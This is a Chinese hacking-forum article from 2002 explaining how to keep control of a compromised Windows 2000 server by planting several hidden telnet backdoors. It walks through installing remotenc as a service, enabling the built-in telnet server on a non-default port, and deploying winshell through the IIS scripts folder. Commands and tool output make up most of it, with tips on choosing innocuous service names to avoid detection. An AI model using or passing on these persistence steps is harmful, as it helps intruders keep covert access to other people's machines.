首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
关于妥善安置telnet后门
来源:vittersafe.tk 作者:vitter 发布时间:2002-11-02  

当我们成功进入肉鸡,拿到admin权限后,建立一个好的后门就是充分
发挥肉鸡作用和保护我们劳动成果的必要步骤了。建立telnet后门的程序
很多,如:winshell,ntshell,remotenc等等,各有各的优点,winshell程序
短小精悍,只有4K,用起来很方便,ntshell功能强大(楚楚留香的网页有详细
教材),小榕的remotenc简单易用,一条指令就搞定了。但在
使用过程中,会发生后门被封杀,不能进入,对于这种问题,我们就可以
针对情况,多安置一些后门,并加强隐蔽性(linux下相对要容易一些哦!)。
----------------------------------------------------------------------
1.利用小榕的remotenc在xxx.xxx.32.139上安装后门:

C:\tools>remotenc xxx.xxx.32.139 abc 123 localsystem 2000server 2000server 321 123

=======RemoteNC Beta 2, Written by Assassin 2001=======
http://www.netXeyes.com http://www.netXeyes.org
[Install Service as LocalSystem Account]
Connecting xxx.xxx.32.139 ..... Done.
Transffer File ..... Done.
Start Service ..... Done.

Now You can Telnet xxx.xxx.32.139 321 to Connect, Have a Joy :-)

#我们可以通过Telnet xxx.xxx.32.139 321来登陆了,注意:要增强隐蔽性,
必须要选择一个好的服务名,让别人不会察觉,具体可自己研究。
--------------------------------------------------------------------------
2.利用nt2000自带的telnet在xxx.xxx.32.139建立后门:

将ntlm.exe文件拷贝到xxx.xxx.32.139上,用刚建立好的remotenc后门登陆:

c:\tools>telnet xxx.xxx.32.139 321

RemoteNC Control Password: **************
===============Banyet Soft Labs. 1995-2001 All Rights Reserved.===============
=========Written by Assassin, Server Edition FluxShadow@21cn.com==============

Microsoft Windows 2000 [Version 5.00.2195]

RemoteNC>ntlm #运行ntlm程序
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!

RemoteNC>net start telnet #启动telnet服务
Telnet 服务正在启动 .
Telnet 服务已经启动成功。

RemoteNC>quit #退出会话
遗失对主机的连接。

#经过以上步骤,就可以telnet xxx.xxx.32.139 登陆了。

用nt自带的telnet的最大的优点是屏幕回显,这是我们有时需要的,但telnet
默认端口是23,这也是每个入侵者和网管都清楚的,也是经常扫描的,为了更好
的隐藏,我们需要更改默认23的端口:
先telnet xxx.xxx.32.139 输入用户名和密码后就可登陆了

*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:\>
C:\>tlntadmn.exe #这个程序是TELNET自带的配置文件

Microsoft (R) Windows 2000 (TM) (内部版本号 2195)
Telnet Server Admin (Build 5.00.99201.1)
请在下列选项中选择一个:

0) 退出这个应用程序
1) 列出当前用户
2) 结束一个用户的会话 ...
3) 显示 / 更改注册表设置 ...
4) 开始服务
5) 停止服务

请键入一个选项的号码 [0 - 5] 以选择该选项: 3

请在下列选项中选择一个:

0) 退出这个菜单
1) AllowTrustedDomain
2) AltKeyMapping
3) DefaultDomain
4) DefaultShell
5) LoginScript
6) MaxFailedLogins
7) NTLM
8) TelnetPort

请键入一个选项的号码 [0 - 8] 以选择该选项: 8
TelnetPort 的当前值 = 23
您确实想更改这个值吗 ? [y/n]y
TelnetPort [ 当前值 = 23; ] :322
您确实想将 TelnetPort 设置为 : 322 ? [y/n]y

只有当 Telnet 服务重新开始后设置才会生效

#都应该看的懂吧?
#用remotenc登陆后,重起服务就可以用telnet xxx.xxx.32.139 322登陆了。
--------------------------------------------------------------------------
3.利用winshell在xxx.xxx.32.139上建立后门:

将winshell.exe 拷贝到肉鸡c:\inetpub\scripts\下,如需使用可以在浏览器
中键入:http://xxx.xxx.32.139/winshell.exe 或 使用AT命令远程启动,就可以
telnet到winshell的默认端口:
telnet xxx.xxx.32.139 5277

如果权限有问题,你也可以上传idq.dll,然后用ipc xxx.xxx.32.139/scripts/idq.dll
------------------------------------------------------------------------------

现在我们不光有admin权限,还有了321 322 5277 三个telnet的后门端口,
就可以充分保护我们对肉鸡的管理权了。




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·DIY socks5跳板
·7种DoS攻击方法简述
·通过mysql入侵NT和win2000
·看紧你的3306端口,一次通过mysq
·黑客防线攻防实验室第二轮1--8关
·看看SQL是怎么一天内两次改换黑
·SQL server7.0的远程连接问题
·通过asp木马配合serv-u取得管理
·Cisco路由入侵艺术
·SQL数据库的一些攻击
·php注入实例
·null.htw 最新利用
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved